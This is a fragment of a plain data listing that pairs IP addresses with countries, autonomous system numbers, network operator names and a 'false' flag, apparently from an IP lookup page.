24157 VIBO-NET-ASTaiwanStarTelecomCorporationLimitedFormer false
53.5.58.198
 unknown Germany
31399 DAIMLER-ASITIGNGlobalNetworkDE false
37.161.8.40
 unknown France
51207 FREEMFR false
223.40.235.76
 unknown Korea Republic of
9644 SKTELECOM-NET-ASSKTelecomKR false
2.199.111.147
 unknown Italy
16232 ASN-TIMServiceProviderIT false
102.177.96.43
 unknown Kenya
39356 AVANTI-UK-ASGB false
123.67.190.45
 unknown China
9394 CTTNETChinaTieTongTelecommunicationsCorporationCN false
171.67.12.67
 unknown United States
32 STANFORDUS false
76.86.113.215
 unknown United States
20001 TWC-20001-PACWESTUS false
210.60.66.201
 unknown Taiwan; Republic of China (ROC)
1659 ERX-TANET-ASN1TaiwanAcademicNetworkTANetInformationC false
31.106.212.216
 unknown United Kingdom
12576 EELtdGB false
85.166.186.24
 unknown Norway
2119 TELENOR-NEXTELTelenorNorgeASNO false
131.126.123.3
 unknown United States
668 DNIC-AS-00668US false
98.14.0.225
 unknown United States
12271 TWC-12271-NYCUS false
210.251.189.196
 unknown Japan 18278 CC9NCableTVCorporationJP false
15.19.103.199
 unknown United States
13979 ATT-IPFRUS false
95.55.230.222
 unknown Russian Federation
12389 ROSTELECOM-ASRU false
12.34.131.123
 unknown United States
7018 ATT-INTERNET4US false
141.161.183.77
 unknown United States
11318 GUUS false
128.116.190.137
 unknown Italy
35612 NGI-ASIT false
118.29.175.133
 unknown China
45090 CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa false
197.83.5.124
 unknown South Africa
10474 OPTINETZA false